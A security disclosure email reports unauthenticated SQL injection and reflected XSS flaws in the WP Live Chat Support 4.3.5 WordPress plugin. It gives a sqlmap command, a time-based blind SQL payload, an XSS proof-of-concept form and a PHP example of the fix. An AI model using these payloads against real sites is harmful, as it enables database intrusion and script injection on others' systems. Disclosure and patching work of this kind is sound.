Subject: Blind SQL injections, XSS and more in wp live chat support 4.3.5
Date: Mon, 6 Jul 2015 14:12:38 +0200

Hello,

Plugin: wp live chat support 4.3.5 

Unauthenticated remote attackers can execute arbitrary SQL commands.


1. SQL injection (wplc_update_user_on_page())

Method: POST
Url: http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php
Vulnerable parameters: cid, status

Example PHP callstack:

wplc_update_user_on_page   [/wp-live-chat-support/functions.php:74]
  wpdb::query

Sqlmap verification:

sqlmap --method POST --data "action=wplc_call_to_server_visitor&cid=-1" --dbms mysql -p cid -u http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php

...
Parameter: cid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=wplc_call_to_server_visitor&cid=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))XGba) AND 'uomP'='uomP
...


2. XSS 

Method: POST
Url: http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php
Vulnerable parameter: wplc_update_admin_chat_table

(The response is JSON, but it is returned with Content-Type text/html, so the reflected value is rendered by the browser.)

Example:

<form action="http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php" method="POST">
<input type="text" name="action" value="wplc_admin_long_poll">
<input type="text" name="wplc_update_admin_chat_table" value="<img src=x onerror='javascript:alert(1);'>">
<input type="submit">
</form>


3. Other SQL injections found in:

wplc_return_chat_status()
wplc_return_admin_chat_messages()
wplc_change_chat_status()
wplc_return_chat_session_variable()
wplc_return_user_chat_messages()
wplc_mark_as_read_user_chat_messages()
wplc_return_chat_name()
wplc_return_chat_email()
wplc_user_initiate_chat()


Please also note that there aren't any user-level checks for the AJAX calls (e.g. wplc_return_admin_chat_messages, wplc_admin_send_msg, etc.).
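For maintainers, the pattern below is an added example (not the plugin's code) of how the three issues above, unparameterised SQL built from cid/status, the missing capability check on AJAX actions, and the text/html response, are fixed in a WordPress AJAX handler. The function name, nonce action, table name, column names and allowed status values are assumptions.

```php
<?php
// Added example, not code from wp-live-chat-support. Names below are assumed.

// Register for authenticated users only. Hooking the same callback on
// wp_ajax_nopriv_* would expose it to unauthenticated visitors.
add_action( 'wp_ajax_example_update_user_on_page', 'example_update_user_on_page' );

function example_update_user_on_page() {
    global $wpdb;

    // 1. Authorisation: require a capability, not merely a logged-in session.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 2. CSRF protection: the nonce is issued to the admin page that issues the call.
    check_ajax_referer( 'example_chat_nonce', 'nonce' );

    // 3. Input validation: cid must be a positive integer, status one of a fixed set.
    $cid            = isset( $_POST['cid'] ) ? absint( $_POST['cid'] ) : 0;
    $status         = isset( $_POST['status'] ) ? sanitize_key( $_POST['status'] ) : '';
    $allowed_status = array( 'open', 'closed' ); // assumed values
    if ( 0 === $cid || ! in_array( $status, $allowed_status, true ) ) {
        wp_send_json_error( array( 'message' => 'invalid input' ), 400 );
    }

    // 4. Parameterised query: $wpdb->prepare() binds the values, so a cid such as
    //    "-1' AND (SELECT ... SLEEP(5) ...)" is treated as data, never as SQL.
    $table = $wpdb->prefix . 'example_chat_sessions'; // assumed table and columns
    $rows  = $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$table} SET status = %s WHERE id = %d",
            $status,
            $cid
        )
    );

    // 5. Correct content type: wp_send_json_success() emits application/json,
    //    so any reflected input is not interpreted as HTML by the browser.
    wp_send_json_success( array( 'updated' => (int) $rows ) );
}
```

The nonce passed as the `nonce` POST field would be generated with wp_create_nonce( 'example_chat_nonce' ) on the page that makes the request.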


--
Regards,
Marcin Probola,
https://wordpress.org/plugins/wp-live-chat-support/